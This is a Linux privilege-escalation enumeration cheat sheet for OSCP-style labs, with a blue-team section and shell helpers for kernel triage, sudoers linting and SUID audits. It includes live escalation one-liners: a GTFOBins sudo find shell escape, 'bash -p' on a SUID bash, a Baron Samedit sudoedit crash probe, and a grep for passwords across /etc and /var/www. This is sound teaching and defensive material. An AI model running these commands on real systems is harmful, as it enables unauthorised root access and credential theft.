Linux Enumeration Cheat Sheet for Privilege Escalation


Introduction / Overview

You have a shell. It is unprivileged, noisy, and probably a half-broken dash with no TTY. The gap between that foothold and root is almost always closed by enumeration, not by some exotic 0-day. The boring id, uname -a, and sudo -l triad finds more boxes than any single CVE.

This article is a focused cheat sheet for the manual Linux enumeration that matters during privilege escalation. It is the workflow I run on every OSCP-style box and on real authorized engagements before reaching for automated tooling. We cover identity and kernel context (id and uname -a), sudo rights, SUID binaries, listening services, and running processes: the six checks that most frequently produce a path to root.

Legal / ethical disclaimer: Everything below is for education and for testing on systems you own or are explicitly authorized to assess (signed scope, lab VMs, CTFs). Running these techniques against systems you do not have written permission to test is illegal in most jurisdictions. Stay in scope.

How it works / Background

Privilege escalation on Linux exploits a misconfiguration or vulnerability that lets a low-privileged user execute code in a higher-privileged context. The common vectors are:

  • SUID/SGID binaries — files with the set-user-ID bit run as the file owner (often root) regardless of who launches them.
  • sudo misconfiguration — overly broad sudoers rules, or sudo CVEs like CVE-2021-3156 (Baron Samedit, heap overflow) and CVE-2019-14287 (!root runas bypass).
  • Kernel exploits — e.g. Dirty Pipe (CVE-2022-0847) or PwnKit/polkit (CVE-2021-4034), which depend on the exact kernel/distro version that uname -a reveals.
  • Exposed services — a database or admin daemon bound to 127.0.0.1 and running as root, surfaced by netstat/ss.
  • Credentials and cron — leaked secrets in process arguments visible to ps aux.

Enumeration is the act of mapping the host against these vectors quickly and systematically.

Prerequisites / Lab setup

You only need an unprivileged shell on a target. To practice safely, spin up a deliberately vulnerable VM:

# Any of these are ideal for practising the workflow below
# - TryHackMe "Linux PrivEsc"
# - VulnHub images (e.g. the "Kioptrix" series)
# - HackTheBox "Easy" Linux boxes

If your shell is not interactive, upgrade it first so that sudo, job control, and tab completion behave:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# then Ctrl-Z, `stty raw -echo; fg`, Enter, Enter

Attack walkthrough / PoC

1. Who am I and what kernel am I on

id              # uid, gid, and crucially the supplementary groups
whoami
uname -a        # kernel version, arch, hostname
cat /etc/os-release    # distro and version

id output like uid=1000(user) groups=1000(user),4(adm),27(sudo),999(docker) is gold: membership in docker, lxd, disk, or adm is often a direct root path. The uname -a string (e.g. Linux victim 5.8.0-43-generic ... x86_64) tells you whether kernel exploits like Dirty Pipe (fixed in 5.16.11/5.15.25/5.10.102) are viable. Always confirm a kernel exploit's preconditions before firing it — a panic ends your engagement.
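The two strings from this step can be triaged mechanically. The helper below is an added example, not code from the article: it pulls the risky group names the article lists out of an id line, and maps a uname -r release onto the Dirty Pipe fix levels quoted above (5.10.102, 5.15.25, 5.16.11, plus the fact that the bug entered in 5.8 and is gone from 5.17 onwards). The risky-group list and the branch table are assumptions taken from the article's own text; the sample id string is constructed.

```shell
#!/bin/sh
# Added example (not from the original article): triage step-1 output.
# Assumptions: risky groups and Dirty Pipe fix levels are the ones the article names.

# Groups the article calls frequent direct root paths.
RISKY_GROUPS="docker lxd disk adm sudo"

# risky_groups ID_OUTPUT -> prints the risky group names present, space separated.
risky_groups() {
    groups=${1##*groups=}                 # everything after "groups="
    out=""
    for g in $RISKY_GROUPS; do
        case ",$groups," in
            *"($g)"*) out="$out $g" ;;    # groups appear as gid(name)
        esac
    done
    printf '%s\n' "${out# }"
}

# dirtypipe_status KERNEL_RELEASE -> prints one of:
#   unaffected  kernel older than 5.8, where the bug was introduced
#   fixed       at or above the listed fix for 5.10/5.15/5.16, or 5.17 and later
#   affected    5.8 or later and below the fix, or a 5.8-5.16 branch with no listed fix
# This only reads the version string; distro kernels that backport the fix
# without bumping the number (patch level 0, e.g. 5.15.0-xx) report "affected".
dirtypipe_status() {
    v=${1%%-*}                            # "5.8.0-43-generic" -> "5.8.0"
    maj=${v%%.*}
    rest=${v#*.}
    min=${rest%%.*}
    if [ "$rest" = "$min" ]; then pat=0; else pat=${rest#*.}; fi
    pat=${pat%%[!0-9]*}                   # drop a trailing non-numeric suffix
    if [ -z "$pat" ]; then pat=0; fi
    if [ "$maj" -lt 5 ] || { [ "$maj" -eq 5 ] && [ "$min" -lt 8 ]; }; then
        echo unaffected; return
    fi
    if [ "$maj" -gt 5 ] || [ "$min" -ge 17 ]; then
        echo fixed; return
    fi
    case "$min" in
        10) fix=102 ;;
        15) fix=25 ;;
        16) fix=11 ;;
        *)  echo affected; return ;;      # 5.8, 5.9, 5.11-5.14: no fix listed
    esac
    if [ "$pat" -ge "$fix" ]; then echo fixed; else echo affected; fi
}

# Demo on constructed input (the id line is the article's own example).
SAMPLE_ID='uid=1000(user) gid=1000(user) groups=1000(user),4(adm),27(sudo),999(docker)'
printf 'risky groups: %s\n' "$(risky_groups "$SAMPLE_ID")"
for k in 4.15.0-142-generic 5.8.0-43-generic 5.10.0-20-amd64 5.10.110 5.15.25 6.1.0-13-amd64; do
    printf '%-20s %s\n' "$k" "$(dirtypipe_status "$k")"
done
```

On a live host run `risky_groups "$(id)"` and `dirtypipe_status "$(uname -r)"`. Treat "affected" as "check the distro changelog or security tracker", not as a verdict: Ubuntu and Debian ship 5.15.0-xx / 5.10.0-xx style releases that carry the backported fix, and the version string cannot show that. A defender can run the same function over a fleet inventory of uname -r strings to find hosts that genuinely sit on an unpatched upstream branch.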

2. Check sudo rights

sudo -l         # lists what the current user may run via sudo

This is the single highest-value command. Look for:

  • (ALL) NOPASSWD: /usr/bin/vim — abuse the program's shell escape (see GTFOBins).
  • env_keep entries like LD_PRELOAD or LD_LIBRARY_PATH — load a malicious shared object.
  • An old sudo version — test CVE-2021-3156:
sudo -V | head -1       # e.g. "Sudo version 1.8.31"
# Baron Samedit affects < 1.9.5p2; check then exploit if vulnerable
sudoedit -s '\' $(python3 -c 'print("A"*1000)')   # crash => likely vulnerable

A classic GTFOBins escape, when find is permitted via sudo:

sudo find . -exec /bin/sh \; -quit

3. Hunt SUID / SGID binaries

# SUID files owned by anyone, suppressing permission-denied noise
find / -perm -4000 -type f 2>/dev/null

# SGID
find / -perm -2000 -type f 2>/dev/null

# Both bits in one pass
find / \( -perm -u=s -o -perm -g=s \) -type f 2>/dev/null   # parentheses needed: -o binds looser than the implied -a

# Capabilities (modern alternative to SUID)
getcap -r / 2>/dev/null

Cross-reference each non-standard result against GTFOBins. A SUID nmap, find, bash, cp, or a custom binary is frequently exploitable. Example for a SUID bash:

/usr/bin/bash -p     # -p preserves the effective uid -> euid root shell

4. Listening services and connections

netstat is deprecated on many distros; learn ss too:

netstat -tulnp 2>/dev/null    # TCP/UDP listening, numeric, with PID
ss -tulnp                     # modern equivalent

Pay attention to services bound to 127.0.0.1 — they are not reachable from your attack box but may run as root and be exploitable locally (e.g. a Redis on 6379, or an internal admin panel). Forward them out for inspection with SSH or chisel.

5. Running processes

ps aux                        # full process listing with users and args
ps aux | grep -i root         # what runs as root
ps -ef --forest               # parent/child tree
watch -n1 'ps -eo pid,user,cmd --sort=-pid | head'   # catch cron jobs

ps aux exposes command-line arguments — passwords passed via --password= or -p, paths to scripts that may be world-writable, and short-lived cron jobs. Combine with a watch loop or pspy to catch root cron tasks you can hijack.

6. Quick wins checklist

crontab -l; cat /etc/crontab; ls -la /etc/cron.*   # scheduled tasks
find / -writable -type d 2>/dev/null               # writable dirs
cat /etc/passwd; ls -la /home/*/.ssh 2>/dev/null   # users and keys
grep -RiIn "password" /etc /var/www 2>/dev/null     # leaked creds
mount; cat /etc/fstab                              # nfs no_root_squash, etc.

When you want to automate this baseline, LinPEAS runs all of the above and colour-codes likely wins — but always understand each finding manually first.

Diagram (text description): from an unprivileged shell, establish identity and kernel context, then branch through sudo rights, SUID/capabilities, exposed services and processes, and kernel exploits — any branch that hits a misconfiguration or known CVE leads to a root shell.

Detection & Defense (Blue Team)

Enumeration is itself an observable behaviour. Defenders should give mitigation equal weight to the offensive technique.

Detect the enumeration:

  • Filesystem-wide find scans (find / -perm -4000) are noisy. With auditd, watch for high-volume execve of find, getcap, and sudo -l from service accounts:
# auditd rule: record every execve of /usr/bin/sudo (sudo -l discovery included) under one key
auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/sudo -k sudo_exec
ausearch -k sudo_exec      # review the hits; add matching rules keyed on find and getcap
  • Repeated sudo -l and reads of /etc/passwd, /etc/shadow, /etc/crontab map to MITRE ATT&CK T1033 (System Owner/User Discovery), T1082 (System Information Discovery), and T1518 (Software Discovery). EDR/Falco rules can alert on these patterns.

Reduce the attack surface:

  • Minimise SUID: audit with find / -perm -4000 yourself and strip the bit (chmod u-s) from anything that does not need it. Prefer file capabilities scoped tightly over blanket SUID.
  • Tighten sudoers: never grant NOPASSWD to interpreters or programs with shell escapes (vim, less, find, awk, nmap). Validate every edit with visudo, treat any Defaults !env_reset with suspicion (it turns off the environment sanitising that blocks LD_* injection), and never add LD_* variables to env_keep.
  • Patch promptly: keep sudo, polkit, and the kernel current. PwnKit (CVE-2021-4034) and Baron Samedit (CVE-2021-3156) both have vendor patches; Dirty Pipe (CVE-2022-0847) is fixed in 5.16.11/5.15.25/5.10.102.
  • Hardening flags: mount /tmp, /var/tmp, and /dev/shm with nosuid,noexec,nodev; never export NFS shares with no_root_squash (keep the default root_squash); restrict who can read other users' process command lines by mounting /proc with hidepid=2.
  • Don't pass secrets on the command line: they leak via ps aux. Use environment files or secret stores instead.
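The SUID and sudoers items above are easy to turn into a repeatable audit, which also covers the cross-referencing step 3 asks for. The two helpers below are an added example, not code from the article: lint_sudoers flags NOPASSWD rules for programs with shell escapes or for ALL, env_keep of LD_* variables and !env_reset; suid_audit diffs a `find / -perm -4000 -type f` listing against an allowlist and suggests the chmod u-s the list recommends. The shell-escape program list and the SUID allowlist are assumptions (build the allowlist from a clean reference install of your own distribution); the sudoers lines and SUID listing fed to them are constructed.

```shell
#!/bin/sh
# Added example (not from the original article): sudoers and SUID audit helpers.
# Assumptions: ESCAPE_BINS and SUID_ALLOWLIST below; adjust to your distribution.

# Programs the article names as shell-escape risks, plus the usual interpreters.
ESCAPE_BINS="vim vi nano less more man find awk nmap python python3 perl bash sh env"

# lint_sudoers   (sudoers-style lines on stdin, one HIGH finding per line on stdout)
lint_sudoers() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac     # skip blanks and comments
        case "$line" in
            *env_keep*LD_*) printf 'HIGH env_keep of LD_* variable: %s\n' "$line" ;;
        esac
        case "$line" in
            *'!env_reset'*) printf 'HIGH env_reset disabled: %s\n' "$line" ;;
        esac
        case "$line" in
            *NOPASSWD:*)
                # everything after NOPASSWD: is a comma separated command list
                printf '%s\n' "${line##*NOPASSWD:}" | tr ',' '\n' | while read -r spec; do
                    if [ -z "$spec" ]; then continue; fi
                    prog=${spec%%[[:space:]]*}      # first word: program path or ALL
                    prog=${prog##*/}                # basename
                    if [ "$prog" = ALL ]; then
                        printf 'HIGH NOPASSWD ALL: %s\n' "$line"
                    fi
                    for b in $ESCAPE_BINS; do
                        if [ "$prog" = "$b" ]; then
                            printf 'HIGH NOPASSWD shell-escape binary %s: %s\n' "$prog" "$line"
                        fi
                    done
                done ;;
        esac
    done
}

# SUID binaries a stock Debian/Ubuntu host legitimately needs (assumption; derive
# yours from a freshly installed reference image and keep it under version control).
SUID_ALLOWLIST="/usr/bin/sudo /usr/bin/passwd /usr/bin/su /usr/bin/mount /usr/bin/umount
/usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# suid_audit   (output of "find / -perm -4000 -type f" on stdin)
# Prints a REVIEW line for every SUID file that is not on the allowlist.
suid_audit() {
    while IFS= read -r path; do
        allowed=no
        for a in $SUID_ALLOWLIST; do
            if [ "$path" = "$a" ]; then allowed=yes; fi
        done
        if [ "$allowed" = no ]; then
            printf 'REVIEW %s (not in allowlist; if unneeded: chmod u-s %s)\n' "$path" "$path"
        fi
    done
}

# Constructed inputs for the demo.
SAMPLE_SUDOERS='Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
deploy ALL=(ALL) NOPASSWD: /usr/bin/vim, /usr/bin/systemctl restart nginx
backup ALL=(root) NOPASSWD: ALL'
SAMPLE_SUID='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/find
/opt/backup/runbackup'

printf '%s\n' "$SAMPLE_SUDOERS" | lint_sudoers
printf '%s\n' "$SAMPLE_SUID" | suid_audit
```

On a real host: `sudo cat /etc/sudoers /etc/sudoers.d/* | lint_sudoers` and `find / -perm -4000 -type f 2>/dev/null | suid_audit`. The linter is deliberately line based and does not resolve Cmnd_Alias definitions, so a rule written as NOPASSWD: EDITORS needs the alias expanded (or the alias lines themselves reviewed) before it is trusted. Scheduling both as a daily job and diffing the output is the cheapest way to notice a new SUID file or a sudoers change between audits.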

For related lateral-movement and credential topics, see Linux SUID Privilege Escalation, Abusing sudo Misconfigurations, and Linux Kernel Exploits in Practice.

Conclusion

Privilege escalation rarely starts with an exploit; it starts with disciplined enumeration. Run the six checks — id, uname -a, sudo -l, SUID hunting, netstat/ss, and ps aux — in order, and you will surface the vast majority of misconfigurations that lead to root. Automated tools like LinPEAS accelerate this, but reading each finding by hand is what builds the instinct that wins boxes and real engagements. For defenders, the same list is a hardening checklist: shrink SUID, lock down sudoers, hide /proc, and patch the named CVEs.
